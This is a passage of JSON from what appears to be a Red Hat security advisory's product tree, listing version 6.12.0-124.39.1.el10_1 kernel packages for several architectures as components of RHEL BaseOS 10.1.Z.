"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch"
},
"product_reference": "kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64"
},
